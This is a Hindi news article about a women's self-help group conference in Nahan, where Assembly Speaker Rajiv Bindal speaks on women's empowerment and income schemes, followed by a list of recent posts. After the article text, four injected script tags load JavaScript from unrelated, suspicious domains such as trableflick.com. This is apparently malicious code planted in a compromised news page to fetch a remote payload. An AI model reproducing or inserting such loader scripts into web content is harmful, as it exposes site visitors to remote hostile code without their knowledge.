Categories: हिमाचल

नाहन में महिलाओं के लिए सम्मेलन पर विधानसभा अध्यक्ष बोले- नारी सशक्त तो हिमाचल सशक्त

<p>नाहन विधानसभा अध्यक्ष डॉ. राजीव बिंदल आज नाहन दौरे पर रहे और डॉ बिंदल ने नाहन के एसएफडीए हॉल में महिला स्वयं सहायता समूहों के विशाल सम्मेलन में बतौर मुख्यातिथि शिरकत की। सम्मेलन में जिला भर से आई सैंकड़ों महिलाएं शामिल हुई, जिन्हें रोजगार से संबंधित विभिन्न विषयों पर जागरूक किया गया। एक दिवसीय सम्मेलन का शुभारंभ विधानसभा अध्यक्ष डॉ राजीव बिंदल ने दीप प्रज्जवलित कर किया। कार्यक्रम में सिरमौर की शान लोईया भेंट कर सम्मानित किया गया। यह सम्मेलन महिलाओं को आत्मनिर्भर बनाने के इरादे से आयोजित किया गया था। इस दौरान विधानसभा अध्यक्ष ने महिलाओं द्वारा लगाई गई प्रदर्शनियों का भी अवलोकन किया।</p>

<p>मीडिया से बात करते हुए विधानसभा अध्यक्ष डॉ राजीव बिंदल ने कहा कि जिला सिरमौर में किसानों की आमदनी बढ़े और हमारी महिलाएं आत्मनिर्भरता की ओर अग्रसर हो, इस दिशा में विहगम प्रयास किए जा रहे हैं। नए-नए स्वयं सहायता समूह बनाए जा रहे हैं, जिन्हें प्रशिक्षण दिया जा रहा है। आज के इस कार्यक्रम में भी करीब 800 महिलाएं हिस्सा ले रही है, जिनकी अनेक प्रकार से आमदनी को बढ़ाने के प्रयास किए जा रहे हैं।</p>

<p>बिंदल ने कहा कि नींबू, मशरूम, पत्तल-डोनो आदि के माध्यम से महिलाओं की आमदनी बढ़े। इसी के तहत आज नाबार्ड को भी शामिल किया गया है, ताकि इसके लिए कोई सेल मार्किट भी डेवेल्प की जा सके। उन्होंने कहा कि सरकार का लक्ष्य है कि महिला सशक्त हैं, तो हमारा इलाका सशक्त है। महिला सशक्त है तो हमारा सिरमौर सशक्त है। महिला सशक्त है तो हिमाचल सशक्त है। महिला काम भी करेगी और सम्मान के साथ भी जीएगी, यह लक्ष्य लेकर हम चले हैं।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578308093135″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

संजौली मस्जिद विवाद : चार अलग-अलग मामलों में 185 आरोपी बनाए,एफआईआर में भाजपा के राज्य कोषाध्यक्ष, विहिप के प्रांत मंत्री भी नामजद

  समाचार फर्स्‍ट नेटवर्क Shimla: संजौली मस्जिद में अवैध निर्माण के विरोध में प्रदर्शन करने…

3 hours ago

खुला नौकरियों का पिटारा: नगरोटा में ही 5000 युवाओं को रोजगार देने का लक्ष्य: बाली

 सिटी ग्रुप ने आयोजित किया रोजगार मेला, 300 का हुआ चयन 35 कंपनियों ने लिया…

7 hours ago

हमीरपुर में गणेश विसर्जन की धूम

  Hamirpur: गणेश महोत्सव के आयोजन के दौरान अंतिम दिन गणेश मूर्ति के विसर्जन से…

8 hours ago

उचित पोषण के लिए दैनिक आहार में विविधता जरूरी: सीडीपीओ

  Hamirpur:महिला एवं बाल विकास विभाग ने राष्ट्रीय पोषण माह के उपलक्ष्य पर सोमवार को…

8 hours ago

हमीरपुर में सदस्यता अभियान पकड़ेगा रफतार, कश्‍यप ने ली बैठक

  Hamirpur: भारतीय जनता पार्टी का देश भर में चला सदस्यता अभियान हिमाचल में भी…

8 hours ago

रंगस स्कूल के विद्यार्थियों को समझाए मौलिक कर्तव्य

  Hamirpur:जिला विधिक सेवाएं प्राधिकरण ने सोमवार को अंतर्राष्ट्रीय ओजोन परत संरक्षण दिवस के उपलक्ष्य…

8 hours ago